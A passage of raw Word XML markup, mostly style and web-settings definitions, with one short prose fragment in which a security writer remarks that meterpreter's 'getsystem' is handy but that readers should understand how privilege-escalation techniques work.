        <w:t xml:space="preserve"> but this is the one I’m describing. This method is my best friend. It is my life. I must master it as I must master my life. Oh sorry, didn’t mean to go all </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>full metal jacket</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> there. So </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> this is one technique and tricks like “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">” within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> are handy but keep in mind their approaches and how they are trying to achieve privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C86E13D" w14:textId="77777777" w:rsidR="00960C5B" w:rsidRPr="00E557B4" w:rsidRDefault="00960C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00960C5B" w:rsidRPr="00E55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B4"/>
    <w:rsid w:val="00221B72"/>
    <w:rsid w:val="004979A1"/>
    <w:rsid w:val="00960C5B"/>
    <w:rsid w:val="00E55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5083E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E2EF7047-CFF4-42E0-ABA6-3A4DDB38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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7B4"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00E557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7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7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7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7B4"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00E557B4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00E557B4"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00E557B4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00E55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7B4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00E557B4"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E557B4"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E557B4"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E557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235872">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="958025342">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1281104045">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2069759709">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1611621783">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1088038123">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1324162509">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1183325289">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1514799466">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1208834768">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1907254081">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2049448624">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2127308255">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1631940992">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1831864833">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1950811991">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1901011953">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2077316338">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="287592226">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="941297975">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1591739037">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="327173943">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1720862005">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="711005455">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="743794603">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="260921564">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1741633440">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1668901522">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="361786071">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1145858397">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="135415624">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="473984183">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1274093144">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1128356780">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1104956757">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1387146468">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="41373790">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1728989519">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1189417214">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1800681976">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2092117712">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="417950210">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1907256558">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="59838409">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2036880533">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
